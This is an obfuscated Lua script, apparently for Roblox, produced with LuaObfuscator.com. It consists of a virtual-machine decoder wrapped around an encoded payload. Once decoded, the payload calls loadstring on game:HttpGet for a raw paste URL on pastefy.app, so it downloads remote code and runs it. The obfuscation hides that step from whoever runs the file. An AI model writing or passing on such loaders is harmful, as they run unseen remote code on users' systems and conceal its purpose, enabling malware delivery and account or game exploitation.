--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v82,v19);v19=nil;v90=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(2^(v32-(2 -1))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + 1)) ;return v83-(v83%(2 -(1 + 0))) ;else local v84=619 -(555 + 64) ;local v85;while true do if (v84==0) then v85=(933 -(857 + (951 -(282 + 595))))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + (17 -13) ;return (v40 * ((5303816 + 18613638) -7140238)) + (v39 * 65536) + (v38 * (1321 -(68 + 997))) + v37 ;end local function v24() local v41=957 -((1683 -(368 + 423)) + (204 -139)) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==3) then if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 -0) ;else v46=351 -((105 -(10 + 8)) + 263) ;v44=180 -(67 + 113) ;end elseif (v46==(1502 + 545)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((7 -(19 -14))^(1004 -(802 + 150))))) ;end if (v41==((444 -(416 + 26)) -1)) then v44=1 -0 ;v45=(v20(v43,1,15 + 5 ) * (((3189 -2190) -(915 + 36 + 46))^32)) + v42 ;v41=5 -(4 -1) ;end if (v41==(2 + 0)) then v46=v20(v43,27 -6 ,1218 -(1069 + 118) );v47=((v20(v43,470 -(145 + 293) )==(2 -1)) and  -1) or (1 -0) ;v41=1 + 2 ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 ;end end end local function v25(v48) local v49;if  not v48 then local v86=430 -(44 + 386) ;while true do if (v86==(0 + 0)) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1487 -(998 + 488)) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 1384 -(746 + 638) ;end)();while true do if (v67==(0 + 0)) then if (v51==0) then local v96=(function() return 0 + 0 ;end)();while true do if (v96==(202 -(14 + 188))) then v52=(function() return function(v132,v133,v134) local v135=(function() return 0 -0 ;end)();local v136=(function() return;end)();while true do if (v135~=(675 -(534 + 141))) then else v136=(function() return 0 + 0 ;end)();while true do if (v136~=(0 + 0)) then else local v179=(function() return 0 + 0 ;end)();while true do if ((0 + 0)==v179) then v132[v133-#"!" ]=(function() return v134();end)();return v132,v133,v134;end end end end break;end end end;end)();v53=(function() return {};end)();v96=(function() return 1;end)();end if (v96~=(1 -0)) then else v54=(function() return {};end)();v51=(function() return 1;end)();break;end end end if (v51~=(2 -0)) then else local v97=(function() return 0;end)();while true do if (v97==(0 -0)) then v58=(function() return {};end)();for v128= #">",v57 do local v129=(function() return 0 + 0 ;end)();local v130=(function() return;end)();local v131=(function() return;end)();while true do if (v129==(0 + 0)) then local v173=(function() return 0 + 0 ;end)();local v174=(function() return;end)();while true do if (v173==(396 -(115 + 281))) then v174=(function() return 0 -0 ;end)();while true do if (v174~=(1467 -(899 + 568))) then else v130=(function() return v21();end)();v131=(function() return nil;end)();v174=(function() return 1 + 0 ;end)();end if (v174~=(2 -1)) then else v129=(function() return 2 -1 ;end)();break;end end break;end end end if ((3 -2)==v129) then if (v130== #":") then v131=(function() return v21()~=(867 -(550 + 317)) ;end)();elseif (v130==(2 -0)) then v131=(function() return v24();end)();elseif (v130~= #"91(") then else v131=(function() return v25();end)();end v58[v128]=(function() return v131;end)();break;end end end v97=(function() return 1 -0 ;end)();end if (1~=v97) then else v56[ #"-19"]=(function() return v21();end)();v51=(function() return 3;end)();break;end end end v67=(function() return 1 + 0 ;end)();end if (v67==(2 -1)) then if (v51~=(1459 -(282 + 1174))) then else for v99= #">",v23() do local v100=(function() return v21();end)();if (v20(v100, #"]", #"\\")==(285 -(134 + 151))) then local v122=(function() return 1665 -(970 + 695) ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v122==0) then v123=(function() return v20(v100,813 -(569 + 242) , #"xxx");end)();v124=(function() return v20(v100, #"asd1",17 -11 );end)();v122=(function() return 1 + 0 ;end)();end if (v122==(5 -2)) then if (v20(v124, #"91(", #"asd")== #",") then v125[ #".dev"]=(function() return v58[v125[ #"0313"]];end)();end v53[v99]=(function() return v125;end)();break;end if (v122==(1253 -(721 + 530))) then if (v20(v124, #"!", #"[")== #"\\") then v125[1992 -(582 + 1408) ]=(function() return v58[v125[2]];end)();end if (v20(v124,6 -4 ,2)== #",") then v125[ #"-19"]=(function() return v58[v125[ #"xnx"]];end)();end v122=(function() return 3;end)();end if (v122~=(1 -0)) then else local v166=(function() return 0 + 0 ;end)();local v167=(function() return;end)();while true do if (v166==(0 -0)) then v167=(function() return 1824 -(1195 + 629) ;end)();while true do if (v167==1) then v122=(function() return 2 -0 ;end)();break;end if (v167==(0 + 0)) then v125=(function() return {v22(),v22(),nil,nil};end)();if (v123==(1086 -(461 + 625))) then local v181=(function() return 780 -(162 + 618) ;end)();local v182=(function() return;end)();while true do if (v181==(0 + 0)) then v182=(function() return 0;end)();while true do if (v182~=0) then else v125[ #"19("]=(function() return v22();end)();v125[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v123== #"~") then v125[ #"19("]=(function() return v23();end)();elseif (v123==2) then v125[ #"asd"]=(function() return v23() -((2 + 0)^(1304 -(993 + 295))) ;end)();elseif (v123== #"xxx") then local v187=(function() return 0 + 0 ;end)();local v188=(function() return;end)();while true do if (v187==(1171 -(418 + 753))) then v188=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v188) then else v125[ #"-19"]=(function() return v23() -(2^(2 + 14)) ;end)();v125[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v167=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end end end end for v101= #"~",v23() do v54,v101,v28=(function() return v52(v54,v101,v28);end)();end return v56;end if (v51~=(1001 -(451 + 549))) then else local v98=(function() return 0 + 0 ;end)();while true do if (v98~=(1 + 0)) then else v57=(function() return v23();end)();v51=(function() return 1771 -(1749 + 20) ;end)();break;end if (v98==(0 + 0)) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v98=(function() return 1;end)();end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1147 -(466 + (2008 -(797 + 532))) ];local v64=v59[6 -3 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=2 -1 ;local v73= -(1901 -(106 + 1794));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0 + 0 + 0) ;local v77={};local v78={};for v87=0 + 0 ,v76 do if ((3242>=567) and (v87>=v70)) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + (2 -1) ];end end local v79=(v76-v70) + (2 -1) ;local v80;local v81;while true do v80=v68[v72];v81=v80[115 -(4 + 110) ];if ((v81<=3) or (847>=1263)) then if (v81<=(585 -(57 + 527))) then if ((v81==(1427 -((96 -55) + 1386))) or (2253==1851)) then v78[v80[105 -(17 + 86) ]]=v61[v80[3 + 0 ]];else do return;end end elseif (v81>2) then local v104=v80[3 -1 ];local v105,v106=v71(v78[v104](v13(v78,v104 + (2 -1) ,v80[169 -(122 + (1246 -(373 + 829))) ])));v73=(v106 + v104) -(1 -0) ;local v107=0 -0 ;for v126=v104,v73 do local v127=0;while true do if (v127==0) then v107=v107 + 1 + 0 ;v78[v126]=v105[v107];break;end end end else local v108=0 + 0 ;local v109;local v110;while true do if (v108==(0 -0)) then v109=v80[67 -(30 + 35) ];v110=v78[v80[3 + 0 ]];v108=1258 -(1043 + 214) ;end if (v108==(3 -2)) then v78[v109 + (1213 -(323 + 889)) ]=v110;v78[v109]=v110[v80[(741 -(476 + 255)) -(1136 -(369 + 761)) ]];break;end end end elseif (v81<=(585 -(361 + 219))) then if (v81==((188 + 136) -(53 + 267))) then v78[v80[1 + 1 ]]=v80[3];else v78[v80[2 -0 ]]();end elseif (v81==6) then local v113=0;local v114;while true do if (v113==(413 -((28 -13) + 398))) then v114=v80[(1222 -(64 + 174)) -(18 + 964) ];v78[v114]=v78[v114](v13(v78,v114 + (3 -2) ,v73));break;end end else local v115=0 + 0 ;local v116;local v117;local v118;local v119;local v120;while true do if ((v115==(0 + 0)) or (2087>2372)) then v116=nil;v117,v118=nil;v119=nil;v120=nil;v115=851 -(20 + 830) ;end if (v115==4) then v78[v80[2 + 0 ]]=v80[3];v72=v72 + (127 -(116 + 10)) ;v80=v68[v72];v120=v80[1 + 1 ];v115=743 -(542 + 28 + 168) ;end if (v115==((24 -7) -9)) then v80=v68[v72];do return;end break;end if (v115==5) then v117,v118=v71(v78[v120](v13(v78,v120 + 1 + 0 ,v80[2 + 1 ])));v73=(v118 + v120) -(1 + (336 -(144 + 192))) ;v116=0 -0 ;for v170=v120,v73 do v116=v116 + (2 -1) ;v78[v170]=v117[v116];end v115=6;end if (v115==7) then v72=v72 + 1 ;v80=v68[v72];v78[v80[1553 -((1342 -(42 + 174)) + 425) ]]();v72=v72 + (406 -(118 + 287)) ;v115=31 -23 ;end if (v115==(1 + 0)) then v78[v80[1123 -(118 + 831 + 172) ]]=v61[v80[8 -5 ]];v72=v72 + (378 -(142 + 235)) ;v80=v68[v72];v78[v80[2]]=v61[v80[13 -10 ]];v115=1 + 1 ;end if (v115==(979 -(553 + 424))) then v72=v72 + 1 ;v80=v68[v72];v120=v80[3 -1 ];v119=v78[v80[3 + 0 ]];v115=3 + 0 ;end if ((v115==(2 + 1)) or (4445<4149)) then v78[v120 + 1 + 0 ]=v119;v78[v120]=v119[v80[3 + 1 ]];v72=v72 + (2 -1) ;v80=v68[v72];v115=4;end if ((v115==(16 -10)) or (1818==85)) then v72=v72 + (2 -1) ;v80=v68[v72];v120=v80[1 + 1 ];v78[v120]=v78[v120](v13(v78,v120 + (4 -3) ,v73));v115=760 -(239 + 219 + 295) ;end end end v72=v72 + 1 + (1504 -(363 + 1141)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F6E70674C333759742F72617700083Q0012073Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
